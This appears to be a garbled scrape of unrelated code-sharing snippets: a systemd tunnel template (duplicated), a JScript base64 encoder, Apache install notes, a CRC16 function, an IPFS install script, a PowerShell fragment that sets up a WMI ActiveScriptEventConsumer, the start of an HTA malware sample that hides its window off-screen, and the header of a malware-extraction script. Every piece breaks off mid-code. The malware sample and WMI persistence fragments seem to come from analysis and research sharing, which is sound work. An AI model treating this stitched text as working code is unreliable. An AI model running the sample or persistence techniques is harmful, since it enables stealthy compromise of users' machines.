Create a template service file at /etc/systemd/system/[email protected]
. The template parameter will correspond to the name
of target host:
[Unit]
Description=Setup a secure tunnel to %I
After=network.target
var fsDoOverwrite = true // Overwrite file with base64 code | |
var fsAsASCII = false // Create base64 code file as ASCII file | |
var adTypeBinary = 1 // Binary file is encoded | |
function encode(from, to) { | |
var inputStream = WScript.CreateObject("ADODB.Stream"); | |
inputStream.Type = adTypeBinary | |
inputStream.Open(); | |
inputStream.LoadFromFile(from); | |
http://www.hackersgarage.com/install-mod_proxy-apache-module-on-whmcpanel-ceentos-linux-server.html | |
Installation : | |
Check Apache current version : | |
/usr/local/apache/bin/httpd -v | |
Output : | |
Server version: Apache/2.2.19 (Unix) |
uint16_t crc16(char* pData, int length) | |
{ | |
uint8_t i; | |
uint16_t wCrc = 0xffff; | |
while (length--) { | |
wCrc ^= *(unsigned char *)pData++ << 8; | |
for (i=0; i < 8; i++) | |
wCrc = wCrc & 0x8000 ? (wCrc << 1) ^ 0x1021 : wCrc << 1; | |
} | |
return wCrc & 0xffff; |
license: gpl-3.0 |
Create a template service file at /etc/systemd/system/[email protected]
. The template parameter will correspond to the name
of target host:
[Unit]
Description=Setup a secure tunnel to %I
After=network.target
# PowerShell 2.0+ | |
# Description: Powershell script to add Event Consumer | |
# Original Template (Eventlog Consumer) attributed to @mattifestation: https://gist.github.com/mattifestation/aff0cb8bf66c7f6ef44a | |
# Set Variables | |
$Name = 'StagingLocation_Example' | |
$Query = 'SELECT * FROM __InstanceCreationEvent WITHIN 30 WHERE TargetInstance ISA "CIM_DataFile" AND TargetInstance.Drive = "C:" AND TargetInstance.Path = "\\Windows\\VSS\\"' | |
$EventNamespace = 'root/cimv2' | |
$Class = 'ActiveScriptEventConsumer' |
#!/bin/bash | |
#pick your IPFS version | |
VERS=0.4.13 | |
DIST="go-ipfs_v${VERS}_linux-amd64.tar.gz" | |
sudo apt-get update | |
sudo apt-get install golang-go -y | |
wget https://dist.ipfs.io/go-ipfs/v0.4.13/$DIST | |
tar xvfz $DIST |
## uploaded by @JohnLaTwC | |
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
<html> | |
<head> | |
<script language="JScript"> | |
window.resizeTo(1, 1); | |
window.moveTo(-2000, -2000); | |
window.blur(); | |
try |
#extract malware from: 9e6ff58202f6c1bd2381e8209231efd0ef6855db59db975fb5b75041706ed104 | |
import re | |
import sys | |
import zlib | |
import struct | |
import hashlib | |
import oledump | |
import olefile | |
import binascii | |
import cStringIO |